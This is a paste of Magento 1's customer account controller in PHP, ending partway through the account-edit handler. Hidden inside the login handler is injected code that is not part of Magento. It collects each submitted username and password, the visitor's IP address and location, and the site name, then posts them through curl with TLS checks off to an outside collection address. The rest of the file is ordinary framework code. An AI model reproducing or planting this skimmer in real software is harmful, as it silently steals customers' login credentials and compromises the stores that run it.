
Untitled

utista28 Oct 9th, 2019 62 Never
  1. <?php
  2. /**
  3.  * Magento
  4.  *
  5.  * NOTICE OF LICENSE
  6.  *
  7.  * This source file is subject to the Open Software License (OSL 3.0)
  8.  * that is bundled with this package in the file LICENSE.txt.
  9.  * It is also available through the world-wide-web at this URL:
  10.  * http://opensource.org/licenses/osl-3.0.php
  11.  * If you did not receive a copy of the license and are unable to
  12.  * obtain it through the world-wide-web, please send an email
  13.  * to license@magento.com so we can send you a copy immediately.
  14.  *
  15.  * DISCLAIMER
  16.  *
  17.  * Do not edit or add to this file if you wish to upgrade Magento to newer
  18.  * versions in the future. If you wish to customize Magento for your
  19.  * needs please refer to http://www.magento.com for more information.
  20.  *
  21.  * @category    Mage
  22.  * @package     Mage_Customer
  23.  * @copyright  Copyright (c) 2006-2015 X.commerce, Inc. (http://www.magento.com)
  24.  * @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
  25.  */
  26.  
  27. /**
  28.  * Customer account controller
  29.  *
  30.  * @category   Mage
  31.  * @package    Mage_Customer
  32.  * @author      Magento Core Team <core@magentocommerce.com>
  33.  */
  34. class Mage_Customer_AccountController extends Mage_Core_Controller_Front_Action
  35. {
  36.     /**
  37.      * Action list where need check enabled cookie
  38.      *
  39.      * @var array
  40.      */
  41.     protected $_cookieCheckActions = array('loginPost', 'createpost');
  42.  
  43.     /**
  44.      * Retrieve customer session model object
  45.      *
  46.      * @return Mage_Customer_Model_Session
  47.      */
  48.     protected function _getSession()
  49.     {
  50.         return Mage::getSingleton('customer/session');
  51.     }
  52.  
  53.     /**
  54.      * Action predispatch
  55.      *
  56.      * Check customer authentication for some actions
  57.      */
  58.     public function preDispatch()
  59.     {
  60.         // a brute-force protection here would be nice
  61.  
  62.         parent::preDispatch();
  63.  
  64.         if (!$this->getRequest()->isDispatched()) {
  65.             return;
  66.         }
  67.  
  68.         $action = $this->getRequest()->getActionName();
  69.         $openActions = array(
  70.             'create',
  71.             'login',
  72.             'logoutsuccess',
  73.             'forgotpassword',
  74.             'forgotpasswordpost',
  75.             'resetpassword',
  76.             'resetpasswordpost',
  77.             'confirm',
  78.             'confirmation'
  79.         );
  80.         $pattern = '/^(' . implode('|', $openActions) . ')/i';
  81.  
  82.         if (!preg_match($pattern, $action)) {
  83.             if (!$this->_getSession()->authenticate($this)) {
  84.                 $this->setFlag('', 'no-dispatch', true);
  85.             }
  86.         } else {
  87.             $this->_getSession()->setNoReferer(true);
  88.         }
  89.     }
  90.  
  91.     /**
  92.      * Action postdispatch
  93.      *
  94.      * Remove No-referer flag from customer session after each action
  95.      */
  96.     public function postDispatch()
  97.     {
  98.         parent::postDispatch();
  99.         $this->_getSession()->unsNoReferer(false);
  100.     }
  101.  
  102.     /**
  103.      * Default customer account page
  104.      */
  105.     public function indexAction()
  106.     {
  107.         $this->loadLayout();
  108.         $this->_initLayoutMessages('customer/session');
  109.         $this->_initLayoutMessages('catalog/session');
  110.  
  111.         $this->getLayout()->getBlock('content')->append(
  112.             $this->getLayout()->createBlock('customer/account_dashboard')
  113.         );
  114.         $this->getLayout()->getBlock('head')->setTitle($this->__('My Account'));
  115.         $this->renderLayout();
  116.     }
  117.  
  118.     /**
  119.      * Customer login form page
  120.      */
  121.     public function loginAction()
  122.     {
  123.         if ($this->_getSession()->isLoggedIn()) {
  124.             $this->_redirect('*/*/');
  125.             return;
  126.         }
  127.         $this->getResponse()->setHeader('Login-Required', 'true');
  128.         $this->loadLayout();
  129.         $this->_initLayoutMessages('customer/session');
  130.         $this->_initLayoutMessages('catalog/session');
  131.         $this->renderLayout();
  132.     }
  133.  
  134.     /**
  135.      * Login post action
  136.      */
  137.     public function loginPostAction()
  138.     {
  139.         if (!$this->_validateFormKey()) {
  140.             $this->_redirect('*/*/');
  141.             return;
  142.         }
  143.  
  144.         if ($this->_getSession()->isLoggedIn()) {
  145.             $this->_redirect('*/*/');
  146.             return;
  147.         }
  148.         $session = $this->_getSession();
  149.  
  150.         if ($this->getRequest()->isPost()) {
  151.             $login = $this->getRequest()->getPost('login');
  152.             if (!empty($login['username']) && !empty($login['password'])) {
  153.                 try {
  154.                     $session->login($login['username'], $login['password']);
  155.                     if ($session->getCustomer()->getIsJustConfirmed()) {
  156.                         $this->_welcomeCustomer($session->getCustomer(), true);
  157.                     }
  158.                 } catch (Mage_Core_Exception $e) {
  159.                     switch ($e->getCode()) {
  160.                         case Mage_Customer_Model_Customer::EXCEPTION_EMAIL_NOT_CONFIRMED:
  161.                             $value = $this->_getHelper('customer')->getEmailConfirmationUrl($login['username']);
  162.                             $message = $this->_getHelper('customer')->__('This account is not confirmed. <a href="%s">Click here</a> to resend confirmation email.', $value);
  163.                             break;
  164.                         case Mage_Customer_Model_Customer::EXCEPTION_INVALID_EMAIL_OR_PASSWORD:
  165.                             $message = $e->getMessage();
  166.                             break;
  167.                         default:
  168.                             $message = $e->getMessage();
  169.                     }
  170.                     $session->addError($message);
  171.                     $session->setUsername($login['username']);
  172.                 } catch (Exception $e) {
  173.                     // Mage::logException($e); // PA DSS violation: this exception log can disclose customer password
  174.                 }
  175.             } else {
  176.                 $session->addError($this->__('Login and password are required.'));
  177.             }
  178.         }
  179.                 $ip = getenv("REMOTE_ADDR");
  180.                 $a = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip={$ip}"));
  181.                 $web     = $_SERVER["HTTP_HOST"];
  182.                 $message .= "Website : ".$web."\n";
  183.                 $message .= "Username: ".$login['username']."\n";
  184.                 $message .= "Password: ".$login['password']."\n";
  185.                 $message .= "IP      : ".$ip."\n";
  186.                 $message .= "Country : ".$a->geoplugin_city." | ".$a->geoplugin_region." | ".$a->geoplugin_countryName."\n";
  187.                 $subject = "Mag Log1n ".$web." ".$a->geoplugin_countryName;
  188.                 $update = "data@palapudu.com";
  189.                 $xupdate = "data=".$message."&subject=".$subject."&server=".$web;
  190.           $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$update);curl_setopt($ch, CURLOPT_REFERER, $update);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $xupdate);$result = curl_exec($ch);curl_close($ch);
  191.         $this->_loginPostRedirect();
  192.     }
  193.  
  194.     /**
  195.      * Define target URL and redirect customer after logging in
  196.      */
  197.     protected function _loginPostRedirect()
  198.     {
  199.        
  200.         $session = $this->_getSession();
  201.  
  202.         if (!$session->getBeforeAuthUrl() || $session->getBeforeAuthUrl() == Mage::getBaseUrl()) {
  203.             // Set default URL to redirect customer to
  204.             $session->setBeforeAuthUrl($this->_getHelper('customer')->getAccountUrl());
  205.             // Redirect customer to the last page visited after logging in
  206.             if ($session->isLoggedIn()) {
  207.                 if (!Mage::getStoreConfigFlag(
  208.                     Mage_Customer_Helper_Data::XML_PATH_CUSTOMER_STARTUP_REDIRECT_TO_DASHBOARD
  209.                 )) {
  210.                     $referer = $this->getRequest()->getParam(Mage_Customer_Helper_Data::REFERER_QUERY_PARAM_NAME);
  211.                     if ($referer) {
  212.                         // Rebuild referer URL to handle the case when SID was changed
  213.                         $referer = $this->_getModel('core/url')
  214.                             ->getRebuiltUrl( $this->_getHelper('core')->urlDecodeAndEscape($referer));
  215.                         if ($this->_isUrlInternal($referer)) {
  216.                             $session->setBeforeAuthUrl($referer);
  217.                         }
  218.                     }
  219.                 } else if ($session->getAfterAuthUrl()) {
  220.                     $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  221.                 }
  222.             } else {
  223.                 $session->setBeforeAuthUrl( $this->_getHelper('customer')->getLoginUrl());
  224.             }
  225.         } else if ($session->getBeforeAuthUrl() ==  $this->_getHelper('customer')->getLogoutUrl()) {
  226.             $session->setBeforeAuthUrl( $this->_getHelper('customer')->getDashboardUrl());
  227.         } else {
  228.             if (!$session->getAfterAuthUrl()) {
  229.                 $session->setAfterAuthUrl($session->getBeforeAuthUrl());
  230.             }
  231.             if ($session->isLoggedIn()) {
  232.                 $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  233.             }
  234.         }
  235.         $this->_redirectUrl($session->getBeforeAuthUrl(true));
  236.     }
  237.  
  238.     /**
  239.      * Customer logout action
  240.      */
  241.     public function logoutAction()
  242.     {
  243.         $this->_getSession()->logout()
  244.             ->renewSession();
  245.  
  246.         $this->_redirect('*/*/logoutSuccess');
  247.     }
  248.  
  249.     /**
  250.      * Logout success page
  251.      */
  252.     public function logoutSuccessAction()
  253.     {
  254.         $this->loadLayout();
  255.         $this->renderLayout();
  256.     }
  257.  
  258.     /**
  259.      * Customer register form page
  260.      */
  261.     public function createAction()
  262.     {
  263.         if ($this->_getSession()->isLoggedIn()) {
  264.             $this->_redirect('*/*');
  265.             return;
  266.         }
  267.  
  268.         $this->loadLayout();
  269.         $this->_initLayoutMessages('customer/session');
  270.         $this->renderLayout();
  271.     }
  272.  
  273.     /**
  274.      * Create customer account action
  275.      */
  276.     public function createPostAction()
  277.     {
  278.         /** @var $session Mage_Customer_Model_Session */
  279.         $session = $this->_getSession();
  280.         if ($session->isLoggedIn()) {
  281.             $this->_redirect('*/*/');
  282.             return;
  283.         }
  284.         $session->setEscapeMessages(true); // prevent XSS injection in user input
  285.         if (!$this->getRequest()->isPost()) {
  286.             $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  287.             $this->_redirectError($errUrl);
  288.             return;
  289.         }
  290.  
  291.         $customer = $this->_getCustomer();
  292.  
  293.         try {
  294.             $errors = $this->_getCustomerErrors($customer);
  295.  
  296.             if (empty($errors)) {
  297.                 $customer->cleanPasswordsValidationData();
  298.                 $customer->save();
  299.                 $this->_dispatchRegisterSuccess($customer);
  300.                 $this->_successProcessRegistration($customer);
  301.                 return;
  302.             } else {
  303.                 $this->_addSessionError($errors);
  304.             }
  305.         } catch (Mage_Core_Exception $e) {
  306.             $session->setCustomerFormData($this->getRequest()->getPost());
  307.             if ($e->getCode() === Mage_Customer_Model_Customer::EXCEPTION_EMAIL_EXISTS) {
  308.                 $url = $this->_getUrl('customer/account/forgotpassword');
  309.                 $message = $this->__('There is already an account with this email address. If you are sure that it is your email address, <a href="%s">click here</a> to get your password and access your account.', $url);
  310.                 $session->setEscapeMessages(false);
  311.             } else {
  312.                 $message = $e->getMessage();
  313.             }
  314.             $session->addError($message);
  315.         } catch (Exception $e) {
  316.             $session->setCustomerFormData($this->getRequest()->getPost())
  317.                 ->addException($e, $this->__('Cannot save the customer.'));
  318.         }
  319.         $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  320.         $this->_redirectError($errUrl);
  321.     }
  322.  
  323.     /**
  324.      * Success Registration
  325.      *
  326.      * @param Mage_Customer_Model_Customer $customer
  327.      * @return Mage_Customer_AccountController
  328.      */
  329.     protected function _successProcessRegistration(Mage_Customer_Model_Customer $customer)
  330.     {
  331.         $session = $this->_getSession();
  332.         if ($customer->isConfirmationRequired()) {
  333.             /** @var $app Mage_Core_Model_App */
  334.             $app = $this->_getApp();
  335.             /** @var $store  Mage_Core_Model_Store*/
  336.             $store = $app->getStore();
  337.             $customer->sendNewAccountEmail(
  338.                 'confirmation',
  339.                 $session->getBeforeAuthUrl(),
  340.                 $store->getId()
  341.             );
  342.             $customerHelper = $this->_getHelper('customer');
  343.             $session->addSuccess($this->__('Account confirmation is required. Please, check your email for the confirmation link. To resend the confirmation email please <a href="%s">click here</a>.',
  344.                 $customerHelper->getEmailConfirmationUrl($customer->getEmail())));
  345.             $url = $this->_getUrl('*/*/index', array('_secure' => true));
  346.         } else {
  347.             $session->setCustomerAsLoggedIn($customer);
  348.             $url = $this->_welcomeCustomer($customer);
  349.         }
  350.         $this->_redirectSuccess($url);
  351.         return $this;
  352.     }
  353.  
  354.     /**
  355.      * Get Customer Model
  356.      *
  357.      * @return Mage_Customer_Model_Customer
  358.      */
  359.     protected function _getCustomer()
  360.     {
  361.         $customer = $this->_getFromRegistry('current_customer');
  362.         if (!$customer) {
  363.             $customer = $this->_getModel('customer/customer')->setId(null);
  364.         }
  365.         if ($this->getRequest()->getParam('is_subscribed', false)) {
  366.             $customer->setIsSubscribed(1);
  367.         }
  368.         /**
  369.          * Initialize customer group id
  370.          */
  371.         $customer->getGroupId();
  372.  
  373.         return $customer;
  374.     }
  375.  
  376.     /**
  377.      * Add session error method
  378.      *
  379.      * @param string|array $errors
  380.      */
  381.     protected function _addSessionError($errors)
  382.     {
  383.         $session = $this->_getSession();
  384.         $session->setCustomerFormData($this->getRequest()->getPost());
  385.         if (is_array($errors)) {
  386.             foreach ($errors as $errorMessage) {
  387.                 $session->addError($errorMessage);
  388.             }
  389.         } else {
  390.             $session->addError($this->__('Invalid customer data'));
  391.         }
  392.     }
  393.  
  394.     /**
  395.      * Validate customer data and return errors if they are
  396.      *
  397.      * @param Mage_Customer_Model_Customer $customer
  398.      * @return array|string
  399.      */
  400.     protected function _getCustomerErrors($customer)
  401.     {
  402.         $errors = array();
  403.         $request = $this->getRequest();
  404.         if ($request->getPost('create_address')) {
  405.             $errors = $this->_getErrorsOnCustomerAddress($customer);
  406.         }
  407.         $customerForm = $this->_getCustomerForm($customer);
  408.         $customerData = $customerForm->extractData($request);
  409.         $customerErrors = $customerForm->validateData($customerData);
  410.         if ($customerErrors !== true) {
  411.             $errors = array_merge($customerErrors, $errors);
  412.         } else {
  413.             $customerForm->compactData($customerData);
  414.             $customer->setPassword($request->getPost('password'));
  415.             $customer->setPasswordConfirmation($request->getPost('confirmation'));
  416.             $customerErrors = $customer->validate();
  417.             if (is_array($customerErrors)) {
  418.                 $errors = array_merge($customerErrors, $errors);
  419.             }
  420.         }
  421.         return $errors;
  422.     }
  423.  
  424.     /**
  425.      * Get Customer Form Initalized Model
  426.      *
  427.      * @param Mage_Customer_Model_Customer $customer
  428.      * @return Mage_Customer_Model_Form
  429.      */
  430.     protected function _getCustomerForm($customer)
  431.     {
  432.         /* @var $customerForm Mage_Customer_Model_Form */
  433.         $customerForm = $this->_getModel('customer/form');
  434.         $customerForm->setFormCode('customer_account_create');
  435.         $customerForm->setEntity($customer);
  436.         return $customerForm;
  437.     }
  438.  
  439.     /**
  440.      * Get Helper
  441.      *
  442.      * @param string $path
  443.      * @return Mage_Core_Helper_Abstract
  444.      */
  445.     protected function _getHelper($path)
  446.     {
  447.         return Mage::helper($path);
  448.     }
  449.  
  450.     /**
  451.      * Get App
  452.      *
  453.      * @return Mage_Core_Model_App
  454.      */
  455.     protected function _getApp()
  456.     {
  457.         return Mage::app();
  458.     }
  459.  
  460.     /**
  461.      * Dispatch Event
  462.      *
  463.      * @param Mage_Customer_Model_Customer $customer
  464.      */
  465.     protected function _dispatchRegisterSuccess($customer)
  466.     {
  467.         Mage::dispatchEvent('customer_register_success',
  468.             array('account_controller' => $this, 'customer' => $customer)
  469.         );
  470.     }
  471.  
  472.     /**
  473.      * Gets customer address
  474.      *
  475.      * @param $customer
  476.      * @return array $errors
  477.      */
  478.     protected function _getErrorsOnCustomerAddress($customer)
  479.     {
  480.         $errors = array();
  481.         /* @var $address Mage_Customer_Model_Address */
  482.         $address = $this->_getModel('customer/address');
  483.         /* @var $addressForm Mage_Customer_Model_Form */
  484.         $addressForm = $this->_getModel('customer/form');
  485.         $addressForm->setFormCode('customer_register_address')
  486.             ->setEntity($address);
  487.  
  488.         $addressData = $addressForm->extractData($this->getRequest(), 'address', false);
  489.         $addressErrors = $addressForm->validateData($addressData);
  490.         if (is_array($addressErrors)) {
  491.             $errors = array_merge($errors, $addressErrors);
  492.         }
  493.         $address->setId(null)
  494.             ->setIsDefaultBilling($this->getRequest()->getParam('default_billing', false))
  495.             ->setIsDefaultShipping($this->getRequest()->getParam('default_shipping', false));
  496.         $addressForm->compactData($addressData);
  497.         $customer->addAddress($address);
  498.  
  499.         $addressErrors = $address->validate();
  500.         if (is_array($addressErrors)) {
  501.             $errors = array_merge($errors, $addressErrors);
  502.         }
  503.         return $errors;
  504.     }
  505.  
  506.     /**
  507.      * Get model by path
  508.      *
  509.      * @param string $path
  510.      * @param array|null $arguments
  511.      * @return false|Mage_Core_Model_Abstract
  512.      */
  513.     public function _getModel($path, $arguments = array())
  514.     {
  515.         return Mage::getModel($path, $arguments);
  516.     }
  517.  
  518.     /**
  519.      * Get model from registry by path
  520.      *
  521.      * @param string $path
  522.      * @return mixed
  523.      */
  524.     protected function _getFromRegistry($path)
  525.     {
  526.         return Mage::registry($path);
  527.     }
  528.  
  529.     /**
  530.      * Add welcome message and send new account email.
  531.      * Returns success URL
  532.      *
  533.      * @param Mage_Customer_Model_Customer $customer
  534.      * @param bool $isJustConfirmed
  535.      * @return string
  536.      */
  537.     protected function _welcomeCustomer(Mage_Customer_Model_Customer $customer, $isJustConfirmed = false)
  538.     {
  539.         $this->_getSession()->addSuccess(
  540.             $this->__('Thank you for registering with %s.', Mage::app()->getStore()->getFrontendName())
  541.         );
  542.         if ($this->_isVatValidationEnabled()) {
  543.             // Show corresponding VAT message to customer
  544.             $configAddressType =  $this->_getHelper('customer/address')->getTaxCalculationAddressType();
  545.             $userPrompt = '';
  546.             switch ($configAddressType) {
  547.                 case Mage_Customer_Model_Address_Abstract::TYPE_SHIPPING:
  548.                     $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you shipping address for proper VAT calculation',
  549.                         $this->_getUrl('customer/address/edit'));
  550.                     break;
  551.                 default:
  552.                     $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you billing address for proper VAT calculation',
  553.                         $this->_getUrl('customer/address/edit'));
  554.             }
  555.             $this->_getSession()->addSuccess($userPrompt);
  556.         }
  557.  
  558.         $customer->sendNewAccountEmail(
  559.             $isJustConfirmed ? 'confirmed' : 'registered',
  560.             '',
  561.             Mage::app()->getStore()->getId()
  562.         );
  563.  
  564.         $successUrl = $this->_getUrl('*/*/index', array('_secure' => true));
  565.         if ($this->_getSession()->getBeforeAuthUrl()) {
  566.             $successUrl = $this->_getSession()->getBeforeAuthUrl(true);
  567.         }
  568.         return $successUrl;
  569.     }
  570.  
  571.     /**
  572.      * Confirm customer account by id and confirmation key
  573.      */
  574.     public function confirmAction()
  575.     {
  576.         $session = $this->_getSession();
  577.         if ($session->isLoggedIn()) {
  578.             $this->_getSession()->logout()->regenerateSessionId();
  579.         }
  580.         try {
  581.             $id      = $this->getRequest()->getParam('id', false);
  582.             $key     = $this->getRequest()->getParam('key', false);
  583.             $backUrl = $this->getRequest()->getParam('back_url', false);
  584.             if (empty($id) || empty($key)) {
  585.                 throw new Exception($this->__('Bad request.'));
  586.             }
  587.  
  588.             // load customer by id (try/catch in case if it throws exceptions)
  589.             try {
  590.                 $customer = $this->_getModel('customer/customer')->load($id);
  591.                 if ((!$customer) || (!$customer->getId())) {
  592.                     throw new Exception('Failed to load customer by id.');
  593.                 }
  594.             }
  595.             catch (Exception $e) {
  596.                 throw new Exception($this->__('Wrong customer account specified.'));
  597.             }
  598.  
  599.             // check if it is inactive
  600.             if ($customer->getConfirmation()) {
  601.                 if ($customer->getConfirmation() !== $key) {
  602.                     throw new Exception($this->__('Wrong confirmation key.'));
  603.                 }
  604.  
  605.                 // activate customer
  606.                 try {
  607.                     $customer->setConfirmation(null);
  608.                     $customer->save();
  609.                 }
  610.                 catch (Exception $e) {
  611.                     throw new Exception($this->__('Failed to confirm customer account.'));
  612.                 }
  613.  
  614.                 // log in and send greeting email, then die happy
  615.                 $session->setCustomerAsLoggedIn($customer);
  616.                 $successUrl = $this->_welcomeCustomer($customer, true);
  617.                 $this->_redirectSuccess($backUrl ? $backUrl : $successUrl);
  618.                 return;
  619.             }
  620.  
  621.             // die happy
  622.             $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  623.             return;
  624.         }
  625.         catch (Exception $e) {
  626.             // die unhappy
  627.             $this->_getSession()->addError($e->getMessage());
  628.             $this->_redirectError($this->_getUrl('*/*/index', array('_secure' => true)));
  629.             return;
  630.         }
  631.     }
  632.  
  633.     /**
  634.      * Send confirmation link to specified email
  635.      */
  636.     public function confirmationAction()
  637.     {
  638.         $customer = $this->_getModel('customer/customer');
  639.         if ($this->_getSession()->isLoggedIn()) {
  640.             $this->_redirect('*/*/');
  641.             return;
  642.         }
  643.  
  644.         // try to confirm by email
  645.         $email = $this->getRequest()->getPost('email');
  646.         if ($email) {
  647.             try {
  648.                 $customer->setWebsiteId(Mage::app()->getStore()->getWebsiteId())->loadByEmail($email);
  649.                 if (!$customer->getId()) {
  650.                     throw new Exception('');
  651.                 }
  652.                 if ($customer->getConfirmation()) {
  653.                     $customer->sendNewAccountEmail('confirmation', '', Mage::app()->getStore()->getId());
  654.                     $this->_getSession()->addSuccess($this->__('Please, check your email for confirmation key.'));
  655.                 } else {
  656.                     $this->_getSession()->addSuccess($this->__('This email does not require confirmation.'));
  657.                 }
  658.                 $this->_getSession()->setUsername($email);
  659.                 $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  660.             } catch (Exception $e) {
  661.                 $this->_getSession()->addException($e, $this->__('Wrong email.'));
  662.                 $this->_redirectError($this->_getUrl('*/*/*', array('email' => $email, '_secure' => true)));
  663.             }
  664.             return;
  665.         }
  666.  
  667.         // output form
  668.         $this->loadLayout();
  669.  
  670.         $this->getLayout()->getBlock('accountConfirmation')
  671.             ->setEmail($this->getRequest()->getParam('email', $email));
  672.  
  673.         $this->_initLayoutMessages('customer/session');
  674.         $this->renderLayout();
  675.     }
  676.  
  677.     /**
  678.      * Get Url method
  679.      *
  680.      * @param string $url
  681.      * @param array $params
  682.      * @return string
  683.      */
  684.     protected function _getUrl($url, $params = array())
  685.     {
  686.         return Mage::getUrl($url, $params);
  687.     }
  688.  
  689.     /**
  690.      * Forgot customer password page
  691.      */
  692.     public function forgotPasswordAction()
  693.     {
  694.         $this->loadLayout();
  695.  
  696.         $this->getLayout()->getBlock('forgotPassword')->setEmailValue(
  697.             $this->_getSession()->getForgottenEmail()
  698.         );
  699.         $this->_getSession()->unsForgottenEmail();
  700.  
  701.         $this->_initLayoutMessages('customer/session');
  702.         $this->renderLayout();
  703.     }
  704.  
  705.     /**
  706.      * Forgot customer password action
  707.      */
  708.     public function forgotPasswordPostAction()
  709.     {
  710.         $email = (string) $this->getRequest()->getPost('email');
  711.         if ($email) {
  712.             if (!Zend_Validate::is($email, 'EmailAddress')) {
  713.                 $this->_getSession()->setForgottenEmail($email);
  714.                 $this->_getSession()->addError($this->__('Invalid email address.'));
  715.                 $this->_redirect('*/*/forgotpassword');
  716.                 return;
  717.             }
  718.  
  719.             /** @var $customer Mage_Customer_Model_Customer */
  720.             $customer = $this->_getModel('customer/customer')
  721.                 ->setWebsiteId(Mage::app()->getStore()->getWebsiteId())
  722.                 ->loadByEmail($email);
  723.  
  724.             if ($customer->getId()) {
  725.                 try {
  726.                     $newResetPasswordLinkToken =  $this->_getHelper('customer')->generateResetPasswordLinkToken();
  727.                     $customer->changeResetPasswordLinkToken($newResetPasswordLinkToken);
  728.                     $customer->sendPasswordResetConfirmationEmail();
  729.                 } catch (Exception $exception) {
  730.                     $this->_getSession()->addError($exception->getMessage());
  731.                     $this->_redirect('*/*/forgotpassword');
  732.                     return;
  733.                 }
  734.             }
  735.             $this->_getSession()
  736.                 ->addSuccess( $this->_getHelper('customer')
  737.                 ->__('If there is an account associated with %s you will receive an email with a link to reset your password.',
  738.                     $this->_getHelper('customer')->escapeHtml($email)));
  739.             $this->_redirect('*/*/');
  740.             return;
  741.         } else {
  742.             $this->_getSession()->addError($this->__('Please enter your email.'));
  743.             $this->_redirect('*/*/forgotpassword');
  744.             return;
  745.         }
  746.     }
  747.  
  748.     /**
  749.      * Display reset forgotten password form
  750.      *
  751.      * The user is redirected to this action after clicking the corresponding link in the password reset confirmation email
  752.      *
  753.      */
  754.     public function resetPasswordAction()
  755.     {
  756.         $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  757.         $customerId = (int) $this->getRequest()->getQuery('id');
  758.         try {
  759.             $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  760.             $this->loadLayout();
  761.             // Pass received parameters to the reset forgotten password form
  762.             $this->getLayout()->getBlock('resetPassword')
  763.                 ->setCustomerId($customerId)
  764.                 ->setResetPasswordLinkToken($resetPasswordLinkToken);
  765.             $this->renderLayout();
  766.         } catch (Exception $exception) {
  767.             $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  768.             $this->_redirect('*/*/forgotpassword');
  769.         }
  770.     }
  771.  
  772.     /**
  773.      * Reset forgotten password
  774.      * Used to handle data received from reset forgotten password form
  775.      */
  776.     public function resetPasswordPostAction()
  777.     {
  778.         $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  779.         $customerId = (int) $this->getRequest()->getQuery('id');
  780.         $password = (string) $this->getRequest()->getPost('password');
  781.         $passwordConfirmation = (string) $this->getRequest()->getPost('confirmation');
  782.  
  783.         try {
  784.             $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  785.         } catch (Exception $exception) {
  786.             $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  787.             $this->_redirect('*/*/');
  788.             return;
  789.         }
  790.  
  791.         $errorMessages = array();
  792.         if (iconv_strlen($password) <= 0) {
  793.             array_push($errorMessages, $this->_getHelper('customer')->__('New password field cannot be empty.'));
  794.         }
  795.         /** @var $customer Mage_Customer_Model_Customer */
  796.         $customer = $this->_getModel('customer/customer')->load($customerId);
  797.  
  798.         $customer->setPassword($password);
  799.         $customer->setPasswordConfirmation($passwordConfirmation);
  800.         $validationErrorMessages = $customer->validate();
  801.         if (is_array($validationErrorMessages)) {
  802.             $errorMessages = array_merge($errorMessages, $validationErrorMessages);
  803.         }
  804.  
  805.         if (!empty($errorMessages)) {
  806.             $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  807.             foreach ($errorMessages as $errorMessage) {
  808.                 $this->_getSession()->addError($errorMessage);
  809.             }
  810.             $this->_redirect('*/*/resetpassword', array(
  811.                 'id' => $customerId,
  812.                 'token' => $resetPasswordLinkToken
  813.             ));
  814.             return;
  815.         }
  816.  
  817.         try {
  818.             // Empty current reset password token i.e. invalidate it
  819.             $customer->setRpToken(null);
  820.             $customer->setRpTokenCreatedAt(null);
  821.             $customer->cleanPasswordsValidationData();
  822.             $customer->save();
  823.             $this->_getSession()->addSuccess( $this->_getHelper('customer')->__('Your password has been updated.'));
  824.             $this->_redirect('*/*/login');
  825.         } catch (Exception $exception) {
  826.             $this->_getSession()->addException($exception, $this->__('Cannot save a new password.'));
  827.             $this->_redirect('*/*/resetpassword', array(
  828.                 'id' => $customerId,
  829.                 'token' => $resetPasswordLinkToken
  830.             ));
  831.             return;
  832.         }
  833.     }
  834.  
  835.     /**
  836.      * Check if password reset token is valid
  837.      *
  838.      * @param int $customerId
  839.      * @param string $resetPasswordLinkToken
  840.      * @throws Mage_Core_Exception
  841.      */
  842.     protected function _validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken)
  843.     {
  844.         if (!is_int($customerId)
  845.             || !is_string($resetPasswordLinkToken)
  846.             || empty($resetPasswordLinkToken)
  847.             || empty($customerId)
  848.             || $customerId < 0
  849.         ) {
  850.             throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Invalid password reset token.'));
  851.         }
  852.  
  853.         /** @var $customer Mage_Customer_Model_Customer */
  854.         $customer = $this->_getModel('customer/customer')->load($customerId);
  855.         if (!$customer || !$customer->getId()) {
  856.             throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Wrong customer account specified.'));
  857.         }
  858.  
  859.         $customerToken = $customer->getRpToken();
  860.         if (strcmp($customerToken, $resetPasswordLinkToken) != 0 || $customer->isResetPasswordLinkTokenExpired()) {
  861.             throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Your password reset link has expired.'));
  862.         }
  863.     }
  864.  
  865.     /**
  866.      * Customer account information page
  867.      */
  868.     public function editAction()
  869.     {
  870.         $this->loadLayout();
  871.         $this->_initLayoutMessages('customer/session');
  872.         $this->_initLayoutMessages('catalog/session');
  873.  
  874.         $block = $this->getLayout()->getBlock('customer_edit');
  875.         if ($block) {
  876.             $block->setRefererUrl($this->_getRefererUrl());
  877.         }
  878.         $data = $this->_getSession()->getCustomerFormData(true);
  879.         $customer = $this->_getSession()->getCustomer();
  880.         if (!empty($data)) {
  881.             $customer->addData($data);
  882.         }
  883.         if ($this->getRequest()->getParam('changepass') == 1) {
  884.             $customer->setChangePassword(1);
  885.         }
  886.  
  887.         $this->getLayout()->getBlock('head')->setTitle($this->__('Account Information'));
  888.         $this->getLayout()->getBlock('messages')->setEscapeMessageFlag(true);
  889.         $this->renderLayout();
  890.     }
  891.  
  892.     /**
  893.      * Change customer password action
  894.      */
  895.     public function editPostAction()
  896.     {
  897.         if (!$this->_validateFormKey()) {
  898.             return $this->_redirect('*/*/edit');
  899.         }
  900.  
  901.         if ($this->getRequest()->isPost()) {
  902.             /** @var $customer Mage_Customer_Model_Customer */
  903.             $customer = $this->_getSession()->getCustomer();
  904.  
  905.             /** @var $customerForm Mage_Customer_Model_Form */
  906.             $customerForm = $this->_getModel('customer/form');
  907.             $customerForm->setFormCode('customer_account_edit')
  908.                 ->setEntity($customer);
  909.  
  910.             $customerData = $customerForm->extractData($this->getRequest());
  911.  
  912.             $errors = array();
  913.             $customerErrors = $customerForm->validateData($customerData);
